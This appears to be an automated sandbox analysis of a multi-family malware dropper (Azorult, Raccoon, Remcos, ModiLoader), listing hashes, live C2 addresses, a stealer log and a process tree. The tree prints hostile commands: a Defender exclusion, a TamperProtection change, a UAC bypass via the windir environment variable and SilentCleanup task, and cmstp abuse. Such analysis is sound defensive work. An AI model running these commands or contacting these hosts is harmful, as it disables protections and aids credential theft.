azorult | 1553300557f17e7cb62c914616267bc733854b98a0edc5215d901cc4f8e4d0f0

Analysis

max time kernel
108s
max time network
152s
platform
windows10_x64
resource
win10
submitted
31-08-2020 12:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa2ccc64b34017295aa8560cd11a34bc.exe
Size

1.2MB
MD5

aa2ccc64b34017295aa8560cd11a34bc
SHA1

0f0e4bd8f204aaf8245fc3b420b97761bfd252e0
SHA256

1553300557f17e7cb62c914616267bc733854b98a0edc5215d901cc4f8e4d0f0
SHA512

6e07f5f56c1e312c8c91cee376fec984d217a655db963ac3e89d5ea468f856dacb231f78fca920bd9374a2730da7372d3d7249f1d46b5b97a11e3097a3238e14

Score

10^/10

azorult modiloader oski raccoon remcos discovery evasion infostealer persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note

[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:03 2020 Launched at: 2020.08.31 - 12:29:45 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (728 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

remcos

protagonist.ac.ug:6969

fgdjhksdfsdxcbv.ru:6969

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/5084-333-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral2/memory/5084-334-0x000000000040616E-mapping.dmp	disable_win_def
behavioral2/memory/3804-346-0x00000000011E0000-0x00000000011E3000-memory.dmp	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Raccoon log file 1 IoCs
Detects a log file produced by the Raccoon Stealer.

Processes:

yara_rule

raccoon_log_file
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

yara_rule
raccoon_log_file

ModiLoader First Stage 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ec0gR61U3d.exe	modiloader_stage1
C:\Users\Admin\AppData\Local\Temp\ec0gR61U3d.exe	modiloader_stage1

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1536-76-0x0000000004320000-0x0000000004370000-memory.dmp	modiloader_stage2

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

Processes:

JHBVfdsadvbcx.exedfgmhjHJdfgopi.exeJHBVfdsadvbcx.exedfgmhjHJdfgopi.exe8uJ5CLF1qr.exeec0gR61U3d.exeUfJw3Bmhwg.exeem888WYDwB.exeUfJw3Bmhwg.exe

pid	process
2556	JHBVfdsadvbcx.exe
3268	dfgmhjHJdfgopi.exe
840	JHBVfdsadvbcx.exe
1096	dfgmhjHJdfgopi.exe
1980	8uJ5CLF1qr.exe
1536	ec0gR61U3d.exe
2404	UfJw3Bmhwg.exe
3804	em888WYDwB.exe
5084	UfJw3Bmhwg.exe

Loads dropped DLL 11 IoCs

Processes:

JHBVfdsadvbcx.exeaa2ccc64b34017295aa8560cd11a34bc.exe

pid	process
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

em888WYDwB.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	em888WYDwB.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	em888WYDwB.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ec0gR61U3d.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rsne = "C:\\Users\\Admin\\AppData\\Local\\Rsne.url"	ec0gR61U3d.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

aa2ccc64b34017295aa8560cd11a34bc.exe

description ioc process

File created C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini aa2ccc64b34017295aa8560cd11a34bc.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini	aa2ccc64b34017295aa8560cd11a34bc.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

aa2ccc64b34017295aa8560cd11a34bc.exeJHBVfdsadvbcx.exedfgmhjHJdfgopi.exe

pid	process
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
1096	dfgmhjHJdfgopi.exe
1096	dfgmhjHJdfgopi.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

aa2ccc64b34017295aa8560cd11a34bc.exeJHBVfdsadvbcx.exedfgmhjHJdfgopi.exeec0gR61U3d.exeUfJw3Bmhwg.exe

description	pid	process	target process
PID 3024 set thread context of 788	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	aa2ccc64b34017295aa8560cd11a34bc.exe
PID 2556 set thread context of 840	2556	JHBVfdsadvbcx.exe	JHBVfdsadvbcx.exe
PID 3268 set thread context of 1096	3268	dfgmhjHJdfgopi.exe	dfgmhjHJdfgopi.exe
PID 1536 set thread context of 4956	1536	ec0gR61U3d.exe	ieinstal.exe
PID 2404 set thread context of 5084	2404	UfJw3Bmhwg.exe	UfJw3Bmhwg.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

JHBVfdsadvbcx.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString JHBVfdsadvbcx.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3108 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1004 taskkill.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat	svchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	JHBVfdsadvbcx.exe

pid	process
3108	timeout.exe

pid	process
1004	taskkill.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 29120160927fd601	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0"	svchost.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

4972 reg.exe
5000 reg.exe

pid	process
4972	reg.exe
5000	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

aa2ccc64b34017295aa8560cd11a34bc.exeJHBVfdsadvbcx.exe

pid	process
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
788	aa2ccc64b34017295aa8560cd11a34bc.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe
840	JHBVfdsadvbcx.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

aa2ccc64b34017295aa8560cd11a34bc.exeJHBVfdsadvbcx.exedfgmhjHJdfgopi.exe

pid process

3024 aa2ccc64b34017295aa8560cd11a34bc.exe
2556 JHBVfdsadvbcx.exe
3268 dfgmhjHJdfgopi.exe

pid	process
3024	aa2ccc64b34017295aa8560cd11a34bc.exe
2556	JHBVfdsadvbcx.exe
3268	dfgmhjHJdfgopi.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

svchost.exetaskkill.exe8uJ5CLF1qr.exeUfJw3Bmhwg.exeem888WYDwB.exeUfJw3Bmhwg.exePowershell.exe

description	pid	process
Token: SeShutdownPrivilege	1432	svchost.exe
Token: SeCreatePagefilePrivilege	1432	svchost.exe
Token: SeDebugPrivilege	1004	taskkill.exe
Token: SeDebugPrivilege	1980	8uJ5CLF1qr.exe
Token: SeDebugPrivilege	2404	UfJw3Bmhwg.exe
Token: SeDebugPrivilege	3804	em888WYDwB.exe
Token: SeDebugPrivilege	5084	UfJw3Bmhwg.exe
Token: SeDebugPrivilege	5092	Powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

aa2ccc64b34017295aa8560cd11a34bc.exeJHBVfdsadvbcx.exedfgmhjHJdfgopi.exe

pid process

3024 aa2ccc64b34017295aa8560cd11a34bc.exe
2556 JHBVfdsadvbcx.exe
3268 dfgmhjHJdfgopi.exe

pid	process
3024	aa2ccc64b34017295aa8560cd11a34bc.exe
2556	JHBVfdsadvbcx.exe
3268	dfgmhjHJdfgopi.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aa2ccc64b34017295aa8560cd11a34bc.exeJHBVfdsadvbcx.exedfgmhjHJdfgopi.exeJHBVfdsadvbcx.execmd.exeaa2ccc64b34017295aa8560cd11a34bc.execmd.exeec0gR61U3d.exe

description	pid	process	target process
PID 3024 wrote to memory of 2556	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	JHBVfdsadvbcx.exe
PID 3024 wrote to memory of 2556	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	JHBVfdsadvbcx.exe
PID 3024 wrote to memory of 2556	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	JHBVfdsadvbcx.exe
PID 3024 wrote to memory of 3268	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	dfgmhjHJdfgopi.exe
PID 3024 wrote to memory of 3268	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	dfgmhjHJdfgopi.exe
PID 3024 wrote to memory of 3268	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	dfgmhjHJdfgopi.exe
PID 3024 wrote to memory of 788	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	aa2ccc64b34017295aa8560cd11a34bc.exe
PID 3024 wrote to memory of 788	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	aa2ccc64b34017295aa8560cd11a34bc.exe
PID 3024 wrote to memory of 788	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	aa2ccc64b34017295aa8560cd11a34bc.exe
PID 3024 wrote to memory of 788	3024	aa2ccc64b34017295aa8560cd11a34bc.exe	aa2ccc64b34017295aa8560cd11a34bc.exe
PID 2556 wrote to memory of 840	2556	JHBVfdsadvbcx.exe	JHBVfdsadvbcx.exe
PID 2556 wrote to memory of 840	2556	JHBVfdsadvbcx.exe	JHBVfdsadvbcx.exe
PID 2556 wrote to memory of 840	2556	JHBVfdsadvbcx.exe	JHBVfdsadvbcx.exe
PID 2556 wrote to memory of 840	2556	JHBVfdsadvbcx.exe	JHBVfdsadvbcx.exe
PID 3268 wrote to memory of 1096	3268	dfgmhjHJdfgopi.exe	dfgmhjHJdfgopi.exe
PID 3268 wrote to memory of 1096	3268	dfgmhjHJdfgopi.exe	dfgmhjHJdfgopi.exe
PID 3268 wrote to memory of 1096	3268	dfgmhjHJdfgopi.exe	dfgmhjHJdfgopi.exe
PID 3268 wrote to memory of 1096	3268	dfgmhjHJdfgopi.exe	dfgmhjHJdfgopi.exe
PID 840 wrote to memory of 1304	840	JHBVfdsadvbcx.exe	cmd.exe
PID 840 wrote to memory of 1304	840	JHBVfdsadvbcx.exe	cmd.exe
PID 840 wrote to memory of 1304	840	JHBVfdsadvbcx.exe	cmd.exe
PID 1304 wrote to memory of 1004	1304	cmd.exe	taskkill.exe
PID 1304 wrote to memory of 1004	1304	cmd.exe	taskkill.exe
PID 1304 wrote to memory of 1004	1304	cmd.exe	taskkill.exe
PID 788 wrote to memory of 1980	788	aa2ccc64b34017295aa8560cd11a34bc.exe	8uJ5CLF1qr.exe
PID 788 wrote to memory of 1980	788	aa2ccc64b34017295aa8560cd11a34bc.exe	8uJ5CLF1qr.exe
PID 788 wrote to memory of 1980	788	aa2ccc64b34017295aa8560cd11a34bc.exe	8uJ5CLF1qr.exe
PID 788 wrote to memory of 1536	788	aa2ccc64b34017295aa8560cd11a34bc.exe	ec0gR61U3d.exe
PID 788 wrote to memory of 1536	788	aa2ccc64b34017295aa8560cd11a34bc.exe	ec0gR61U3d.exe
PID 788 wrote to memory of 1536	788	aa2ccc64b34017295aa8560cd11a34bc.exe	ec0gR61U3d.exe
PID 788 wrote to memory of 2404	788	aa2ccc64b34017295aa8560cd11a34bc.exe	UfJw3Bmhwg.exe
PID 788 wrote to memory of 2404	788	aa2ccc64b34017295aa8560cd11a34bc.exe	UfJw3Bmhwg.exe
PID 788 wrote to memory of 2404	788	aa2ccc64b34017295aa8560cd11a34bc.exe	UfJw3Bmhwg.exe
PID 788 wrote to memory of 3804	788	aa2ccc64b34017295aa8560cd11a34bc.exe	em888WYDwB.exe
PID 788 wrote to memory of 3804	788	aa2ccc64b34017295aa8560cd11a34bc.exe	em888WYDwB.exe
PID 788 wrote to memory of 3804	788	aa2ccc64b34017295aa8560cd11a34bc.exe	em888WYDwB.exe
PID 788 wrote to memory of 1260	788	aa2ccc64b34017295aa8560cd11a34bc.exe	cmd.exe
PID 788 wrote to memory of 1260	788	aa2ccc64b34017295aa8560cd11a34bc.exe	cmd.exe
PID 788 wrote to memory of 1260	788	aa2ccc64b34017295aa8560cd11a34bc.exe	cmd.exe
PID 1260 wrote to memory of 3108	1260	cmd.exe	timeout.exe
PID 1260 wrote to memory of 3108	1260	cmd.exe	timeout.exe
PID 1260 wrote to memory of 3108	1260	cmd.exe	timeout.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe
PID 1536 wrote to memory of 2716	1536	ec0gR61U3d.exe	Notepad.exe

C:\Users\Admin\AppData\Local\Temp\aa2ccc64b34017295aa8560cd11a34bc.exe
"C:\Users\Admin\AppData\Local\Temp\aa2ccc64b34017295aa8560cd11a34bc.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3024

C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe
"C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2556

C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe
"C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 840 & erase C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe & RD /S /Q C:\\ProgramData\\526197207930980\\* & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 840
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1004

C:\Users\Admin\AppData\Local\Temp\dfgmhjHJdfgopi.exe
"C:\Users\Admin\AppData\Local\Temp\dfgmhjHJdfgopi.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3268

C:\Users\Admin\AppData\Local\Temp\dfgmhjHJdfgopi.exe
"C:\Users\Admin\AppData\Local\Temp\dfgmhjHJdfgopi.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1096

C:\Users\Admin\AppData\Local\Temp\aa2ccc64b34017295aa8560cd11a34bc.exe
"C:\Users\Admin\AppData\Local\Temp\aa2ccc64b34017295aa8560cd11a34bc.exe"
2⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:788

C:\Users\Admin\AppData\Local\Temp\8uJ5CLF1qr.exe
"C:\Users\Admin\AppData\Local\Temp\8uJ5CLF1qr.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\8uJ5CLF1qr.exe"'
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Users\Admin\AppData\Local\Temp\ec0gR61U3d.exe
"C:\Users\Admin\AppData\Local\Temp\ec0gR61U3d.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\Notepad.exe
"C:\Windows\System32\Notepad.exe"
4⤵
PID:2716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
5⤵
PID:4908

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
6⤵
- Modifies registry key
PID:4972

C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
6⤵
- Modifies registry key
PID:5000

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
6⤵
PID:5032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
5⤵
PID:3724

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\UfJw3Bmhwg.exe
"C:\Users\Admin\AppData\Local\Temp\UfJw3Bmhwg.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Users\Admin\AppData\Local\Temp\UfJw3Bmhwg.exe
"C:\Users\Admin\AppData\Local\Temp\UfJw3Bmhwg.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5084

\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\sjjbrliw.inf
5⤵
PID:3844

C:\Users\Admin\AppData\Local\Temp\em888WYDwB.exe
"C:\Users\Admin\AppData\Local\Temp\em888WYDwB.exe"
3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:3804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\aa2ccc64b34017295aa8560cd11a34bc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1260

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:3108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1432

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UfJw3Bmhwg.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Temp\8uJ5CLF1qr.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\8uJ5CLF1qr.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe
MD5
eb642a0debaaec150264c0b038109ef1

SHA1
3c1aa8f8d09fa2b6dc95797c07202464e870c5d7

SHA256
aee9b2a1bd1e7893424cf7ff466b840a72d19ac1114ad19297f29affa102c7a0

SHA512
7644c4798270135ccbd4bca3f7ba6e43a71c664b73a21c238938aaaccac04b966c737183a1ea24af93ee95c311e0eb008d8802c73fba72ef4fee217f7930becd

Download Submit
C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe
MD5
eb642a0debaaec150264c0b038109ef1

SHA1
3c1aa8f8d09fa2b6dc95797c07202464e870c5d7

SHA256
aee9b2a1bd1e7893424cf7ff466b840a72d19ac1114ad19297f29affa102c7a0

SHA512
7644c4798270135ccbd4bca3f7ba6e43a71c664b73a21c238938aaaccac04b966c737183a1ea24af93ee95c311e0eb008d8802c73fba72ef4fee217f7930becd

Download Submit
C:\Users\Admin\AppData\Local\Temp\JHBVfdsadvbcx.exe
MD5
eb642a0debaaec150264c0b038109ef1

SHA1
3c1aa8f8d09fa2b6dc95797c07202464e870c5d7

SHA256
